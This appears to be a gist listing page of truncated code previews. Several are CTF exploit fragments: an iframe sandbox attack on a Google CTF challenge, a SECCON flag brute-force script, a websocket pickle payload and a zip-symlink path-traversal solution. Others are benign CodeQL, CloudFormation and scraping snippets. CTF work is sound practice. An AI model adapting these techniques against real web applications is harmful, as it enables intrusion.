| from http.server import HTTPServer | |
| from http.server import BaseHTTPRequestHandler | |
| import requests | |
| import sys | |
| import re | |
| import base64 | |
| import websocket | |
| import time | |
| import threading | |
| import json |
| meisai = [...document.querySelectorAll('#meisaiTable tbody tr')] | |
| .filter(tr => tr.id === '') | |
| .map(tr => [...tr.querySelectorAll('td')]) | |
| .map(tds => { | |
| const date = tds[1].textContent | |
| const content = tds[2].textContent | |
| const price = tds[7].textContent.replaceAll(/\s/gi, '') | |
| return `${date}\t${content}\t\tクレジットカード:ANAゴールドカード\t${price}` | |
| }) | |
| .join('\n') |
To solve the challenge we need to upload a symlink file in zipfile.
When we upload zipfile, it will be unzipped and then, symlink in zipfile will be deleted.
But if the entry name contains ../, symlink will not be deteled.
Therefore we create a symlink entry foo/../bar in zipfile.
| AWSTemplateFormatVersion: 2010-09-09 | |
| Description: A kick-ass cloud app for hacker movienights! | |
| Parameters: | |
| AppName: | |
| Type: String | |
| Default: api-movies | |
| Description: Name of application. | |
| StageName: | |
| Type: String | |
| Default: prod |
| <body> | |
| <script> | |
| const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time)) | |
| const frame = document.createElement('iframe'); | |
| frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`; | |
| document.body.appendChild(frame); | |
| const frame2 = document.createElement('iframe'); | |
| frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`; | |
| frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols') |
| from websocket import create_connection | |
| from base64 import b64encode, b64decode | |
| import pickle | |
| ticket = 'ticket{}' | |
| ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket]) | |
| PICKLE_OP_NAMES = { | |
| "MARK": '(', |
| REPO=$1 | |
| REPO_DIR=repos/$REPO/ | |
| rm -rf $REPO_DIR | |
| mkdir -p $REPO_DIR | |
| cd $REPO_DIR | |
| git clone --depth 1 "https://github.com/$REPO" | |
| curl "https://api.github.com/repos/$REPO/code-scanning/codeql/databases/javascript" -H "accept: application/zip" -L -o codeqldb.zip | |
| unzip -q codeqldb.zip | |
| codeql database analyze ./javascript codeql/javascript-queries --format=sarif-latest --output=codeql.sarif --download |
| <script> | |
| chars = '_0123456789abcdefghijklmnopqrstuvwxyz'.split('') | |
| //chars = '_012345678'.split('') | |
| //chars = '9abcdefgh'.split('') | |
| //chars = 'ijklmnopq'.split('') | |
| //chars = 'rstuvwxyz}'.split('') | |
| let prefix = 'SECCON{' | |
| for (let char of chars) { | |
| setTimeout(() => { | |
| let trial = `${prefix}${char}` |
| // create viewer element | |
| init = () => { | |
| const renderer = document.querySelector('#renderer') | |
| const viewer = document.createElement('div') | |
| viewer.style = ` | |
| position: absolute; | |
| top: 0; | |
| left: 0; | |
| width: 100%; | |
| height: 100%; |
| import javascript | |
| import DataFlow | |
| import DataFlow::PathGraph | |
| class SSRFConfiguration extends TaintTracking::Configuration { | |
| SSRFConfiguration() { this = "SSRFConfiguration" } | |
| override predicate isSource(DataFlow::Node source) { | |
| exists(DataFlow::SourceNode req | | |
| isHTTPRequest(req) and |